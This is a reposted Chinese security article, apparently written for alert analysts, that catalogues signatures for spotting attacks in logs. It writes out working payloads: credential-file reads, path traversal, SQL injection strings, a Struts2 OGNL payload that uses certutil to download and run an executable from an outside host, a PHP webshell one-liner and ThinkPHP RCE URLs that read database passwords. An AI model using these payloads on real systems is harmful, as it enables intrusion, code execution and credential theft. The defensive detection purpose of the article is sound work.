免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表 安世加 的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!
欢迎各位添加微信号:qinchang_198231
加入 安世加 交流群 和大佬们一起交流安全技术
START
0x01前言
0x02期望效果
0x03通用攻击关键特征
/etc/passwd/etc/shadow/c:boot.ini/C:/Windows/system.ini、/windows/win.ini../../../../../ 若是只有一个且后面是图片类型 pdf类型那需结合其他事件进行综合判断cmd.exe /c[/k]、系统命令/bin/bashwget http://xx.xx.xx.xx/xx.shCHR(68)||CHR(113)||CHR(90)||CHR(85)%print(md5(31337))执行命令的函数等。
0x04SQL注入攻击特征
> select * from xx union select null,null> order by 10[5][2][3]> ") or ("1"="1>‘and 1=2-- -[#]、 1') AnD 1419=1419 AnD ('1419'='1420> 1' AND ROW(4622,4623)>(SELECT COUNT(*),CONCAT('PGC2UcNo',(SELECT (CASE WHEN (4622=4622) THEN 1 ELSE 0 END)),'PGC2UcNo',FLOOR(RAND(0)*2))x FROM (SELECT 4624 UNION SELECT 4625 UNION SELECT 4626 UNION SELECT 4627)a GROUP BY x) AND 'PGC2UcNo'='PGC2UcNo> =@`'` Union select userid from `%23@__admin` where 1 or id=@`’`> 9997') AND 8553%3D8553 AND ('PVZl'%3D'PVZl,1'%3BSELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(113)||CHR(90)||CHR(85)%2C5) FROM DUAL> sleep(5)、waitfor delay '0:0:5'> and if (ascii(substr(database(),1,1))、and if (length(database()) (updatexml(1,md5(0x666F7274657374),1)))、extractvalue、NAME_CONST
0x05Strusts2远程代码执行攻击特征
常见安全漏洞对应攻击特征——struts2远程代码执行包含但不限于以下这些:
> #_memberAccess=.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=.apache.struts2.ServletActionContext@getResponse().getWriter(),#res.print('RTbZWnwBUdlseupNYQjf'),#res.flush(),#res.close()> /?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('SgEyRprkLcMdtnsTJCve'),%23w.flush(),%23w.close()}> class.classLoader.resources.dirContext.aliases=/eCJivkuR=conf/> Content-Type: %{(#nike='multipart/form-data').(#dm=.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://wiu.fxxxxxxk.me/download.exe %SystemRoot%/Temp/aodagutnzwrjrlm15341.exe & cmd.exe /c %SystemRoot%/Temp/aodagutnzwrjrlm15341.exe').(#iswin=(.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{
0x06java代码执行攻击特征
常见安全漏洞对应攻击特征——Java代码执行包含但不限于以下这些:
@ognl.OgnlContextnew java.lang.ProcessBuilderprintln((java.lang.Runtime).getRuntime().exec(new java.lang.String、${new java.lang.Integer( import+java.util.*;import+java.io java.io.PrintWriterorg.apache.commons.collections.functors.InvokerTransformer
0x07PHP远程代码执行攻击特征
<?php eval($_POST[xxx])?>eval()assert()preg_replace()create_function()call_user_func()array_map()call_user_func_array()phpinfo()systemexecpopenpassthrushell_execfile_put_contents
0x08Thinkphp远程代码执行攻击特征
index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=MWVVdGJrc2pLZ3AyRmx1Zg=="_method": "__construct", "filter[]": "system", "method": "get", "get[]": 'php -r "phpinfo();“’/index.php?s=/index/\think\app/invokefunction/index.php?s=/index/\think\request/cache?s=index/\thinkRequest/input/index.php/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1?s=index/\thinkmodule/action/param1/${@phpinfo()}/index.php?s=index/thinkconfig/get&name=database.passwordindex.php?s=index/thinkconfig/get&name=database.password c=exec&f=calc.exe&_method=filter
本文始发于微信公众号(安世加):技术干货 | 威胁事件告警分析技巧及处置(一)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论